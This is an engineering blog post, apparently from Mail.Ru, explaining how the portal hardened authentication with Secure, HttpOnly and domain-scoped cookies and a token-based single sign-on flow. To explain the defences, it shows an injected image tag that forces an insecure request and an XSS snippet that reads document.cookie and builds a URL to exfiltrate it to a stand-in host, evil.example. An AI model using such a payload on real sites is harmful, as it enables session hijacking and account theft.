Divide and Govern: How We Implemented Session Separation at Mail.Ru

Mail.Ru is a gigantic portal created more than 15 years ago. Since then we have evolved from a minor web project into the most visited site in the Runet. The portal comprises an enormous number of services, each with its own story and its own team of developers, who had to do their utmost to make sure all projects (new, old and those joining the portal as it evolved) shared a single user authentication system. Then, after many years, we were faced with a task that was almost the opposite: separating user sessions. Why this was necessary, what obstacles tripped us up and how we got around them will be covered in this post.

If we take a trip back to the time when all our services were part of a single second-level domain and separated into third-level domains, introducing common authentication seemed a rather trivial task. To accomplish it, we simply chose the classic (at the time) approach: we introduced a single authentication form shared among all available resources, set an authentication cookie on the second-level domain and started verifying the transmitted cookies on the server side. Nice, simple and functional.

Little by little, the services grew accustomed to using the common authentication cookie, added %LOGIN_NAME% to it for convenient display on portal pages, and eventually began reading the cookies with JavaScript right on their pages. However, the times they were a-changing…

The enemy never sleeps

As our company grew, user accounts became coveted prey for wrongdoers of all sorts. The first to arrive simply used brute force, guessing user passwords in search of people who had chosen their date of birth or their pet's name.

Phishers were not long to follow, sending portal users emails that looked like the ones they received from Mail.Ru. These messages contained links to sites posing as the portal's authentication page, or used other tricks to phish passwords from users.


We don’t sleep either

To fight phishers and brute-forcers, the antispam and security teams were called into action. The technology and user education eventually bore fruit, and security breaches declined considerably. (Weak passwords and human gullibility remain the main factors aiding hackers even today – but that's for another article, folks.)

After a little while this business started making real money, and the small fry were joined by sharks, some of whom sought out vulnerabilities in the web services and used them to gain access to user accounts. To add insult to injury, they also found ways to listen in on the traffic between the user's computer and our services. The target of all this illegal activity was the user's authentication session – in other words, the portal's authentication cookie.

Is HTTPS always HTTPS?

We hid the services most critical in terms of user data security, e.g. Mail and Cloud, behind HTTPS. At the time, a secure HTTPS connection appeared to solve our problems: the data transmitted over such a connection is encrypted and signed, so third parties can neither read nor alter it.

But what happens if a hacker sitting somewhere between the server and the browser forces the user's browser to visit the portal site via an insecure protocol? To make this happen, it is enough to intercept any HTTP response sent to the user in non-encrypted form and add to it an image with the right address:
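A sketch of what the injected markup might look like (portal.example stands in for the real portal host; this is an illustration, not actual attack traffic):

```html
<!-- Injected into any plain-HTTP response the victim receives.
     The browser fetches the image over HTTP and automatically
     attaches the portal's cookies to the request. -->
<img src="http://portal.example/favicon.ico" width="1" height="1">
```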

The hacker thus forces the user's browser to visit the portal via an insecure connection. As shown in the diagram, the session_id cookie is automatically sent to the portal server over the non-encrypted connection, making it low-hanging fruit for the hacker to intercept. After that, they can use the account as easily as if they knew the actual password. To prevent this, the server can flag the cookie as Secure, which tells the browser to send the cookie only over an HTTPS connection. The cookie is flagged as follows:
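A hypothetical response header with the flag set (the cookie name matches the text; the value is made up):

```http
Set-Cookie: session_id=31d4d96e407aad42; Path=/; Secure
```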

This is an important point to take into account when configuring HTTPS on the server: setting the Secure flag on authentication cookies is an absolute must for modern web services, and even more so for a big portal. With centralized authentication, leaving any service in the portal's domain on HTTP gives the green light to anyone seeking to bypass HTTPS. However, even if everything is behind HTTPS and resistant to traffic interception, there is still the risk of web service vulnerabilities being exploited, e.g. XSS. This forces companies to either scrap common authentication altogether or choose another way (which we'll get into later).


“Cross-site scripting (or XSS) may be used, inter alia, to bypass access controls or steal user credentials,” according to a translation of the Russian Wikipedia article. When an attacker exploits an XSS vulnerability, the authentication cookie is what they are after in most cases, since it grants access to the user's account. To hijack a user session, hackers typically use JS code similar to this:
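A minimal sketch of such a payload (evil.example is a made-up attacker host, and document.cookie is stubbed here so the snippet runs outside a browser):

```javascript
// Stub standing in for the browser's cookie store; in a real XSS
// attack the injected script reads the live document.cookie.
const document = { cookie: 'session_id=31d4d96e407aad42' };

// Build the exfiltration URL; in a browser the payload would fire
// the request silently, e.g. via `new Image().src = exfilUrl`.
const exfilUrl =
  'https://evil.example/steal?c=' + encodeURIComponent(document.cookie);

console.log(exfilUrl);
```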

Hands down the most important and effective method for dealing with XSS bugs is to prevent them from ever being created, through testing, developer training, code reviews and security audits. However, when there are lots of projects with different well-staffed teams working on them, absolutely error-free code is impossible. Our main goal is to protect user accounts; we must ensure they are safe regardless of whether the system has XSS vulnerabilities or someone is trying to exploit them.

Here’s where HttpOnly cookies come to the rescue. HttpOnly cookies are impossible to read with JavaScript, but they are still accessible to server-side scripts like any other cookie. Although the technique is far from new (Microsoft introduced HttpOnly cookies 8 years ago in IE6 SP1), not everyone knows why it's worthwhile to use them wherever possible. Cookies inaccessible to JS are a second line of defense against evil-doers planning an XSS attack: malicious code that sneaks onto a page won't be able to steal user cookies via document.cookie. In addition, the HttpOnly flag helps protect user accounts from untrusted scripts, banners or counters loaded from resources beyond the company's control.
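Setting the flag is again a one-line change to the response header (illustrative values, as before):

```http
Set-Cookie: session_id=31d4d96e407aad42; Path=/; Secure; HttpOnly
```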

Nothing is perfect under the sun, and HttpOnly cookies aren't a panacea: the HttpOnly flag does not provide complete shelter from XSS vulnerabilities. It does, however, greatly narrow their exploitation possibilities by not letting JS code hijack the authentication session. There are also situations where it cannot be used – for example, when Flash is used actively. That isn't reason enough to give up on HttpOnly cookies entirely: you can minimize the risks by combining the two types of cookies and using HttpOnly wherever possible. So now we've added the Secure and HttpOnly flags to our cookies – what else is there to do?

Domain-specific cookies

As you may recall, to ensure end-to-end authentication across all our company's services, we used to rely on a single authentication cookie set on the second-level domain. A common authentication cookie is more than just convenient for users; it is also a way to gain access to all services at once through a single vulnerability in the code of any one of the company's projects. Thus, by stealing the authentication cookie from the a.site-with-common-authentication.ru service, an attacker gains access to b.site-with-common-authentication.ru as well.

Traffic sniffing works in a similar way unless Secure cookies are used. If one company service uses HTTPS while another uses HTTP, all an attacker has to do is instruct the browser to call the less secure service, steal the authentication cookie and use it to authenticate against the secure one.

To address this issue, a domain attribute is now added to the cookies:
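A hypothetical header, using the a.company.com domain from the example below:

```http
Set-Cookie: session_id=31d4d96e407aad42; Domain=a.company.com; Path=/; Secure; HttpOnly
```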

This cookie will now be sent by the browser only with requests to the a.company.com domain and its subdomains. With domain-specific cookies, if any one service has a vulnerability, it is the only one to come under attack. This is true both for XSS and for other vulnerabilities.

Wrapping up

So we have converted our most critical services to HTTPS, introduced domain-specific cookies, searched for and eliminated vulnerabilities, and are generally trying to protect ourselves and our users from every angle. But how do we still provide single authentication? To do this in our diverse environment, where HTTP and HTTPS co-exist, we introduced additional domain-specific cookies as an extra security measure for each and every project. In addition to the legacy main authentication cookie (Mpop), an additional cookie (sdc) is set for the project's domain. User authentication is valid only if both cookies – Mpop and the intradomain sdc cookie – are present.
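A rough sketch of that server-side check (the cookie names Mpop and sdc are from the text; the in-memory session stores and token values are made-up placeholders for real backend lookups):

```javascript
// Hypothetical session stores; in production these would be
// backend lookups, not in-memory sets.
const validPortalSessions = new Set(['mpop-token-1']);
const validProjectSessions = new Set(['sdc-token-1']);

// Authentication succeeds only if BOTH the portal-wide Mpop cookie
// and the project's own domain-specific sdc cookie check out.
function isAuthenticated(cookies) {
  return validPortalSessions.has(cookies.Mpop) &&
         validProjectSessions.has(cookies.sdc);
}

console.log(isAuthenticated({ Mpop: 'mpop-token-1', sdc: 'sdc-token-1' })); // true
console.log(isAuthenticated({ Mpop: 'mpop-token-1' }));                     // false
```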

The session separation mechanism at Mail.Ru works as follows: user authentication always occurs via a single sign-on point, auth.mail.ru, which requires a login and password (and potentially a second factor) and issues a domain cookie for .auth.mail.ru with the Secure and HttpOnly flags. None of the projects have access to the user's login and password, and the .auth.mail.ru cookie is likewise unavailable to any of them.

When a user visits a project site they have not yet signed in to, the request is forwarded to the authentication point, which authenticates the user by the .auth.mail.ru cookie, generates a one-time token and redirects to the project's listener page with this token. The project's listener proxies the token to the authentication point, which uses it to generate a project cookie, this time for .project.mail.ru. This way all the advantages of the portal's single authentication are retained, while separate authenticated access to different resources is provided in a user-transparent manner.

Separate sessions are a small but critical step in the overall concept of access separation we are so dedicated to. Separating access allows us to protect our resources more consistently, without relying solely on the “outer circuit”: even if an attacker manages to hijack a session on one of the resources or compromise it in some other way, the damage sustained by the user will be minimal. In addition to separate sessions, there are other access separation techniques invisible to users (which is pretty cool!). But we'll save those for another post.

To recap, we can conclude that even services united on a common platform must (under the hood) go their separate ways, and we are currently applying this approach on our own portal. We are certain that very soon other companies in Russia will follow suit, and a considerable portion of cyber criminals will find themselves suddenly out of work. The enemy shall not pass!
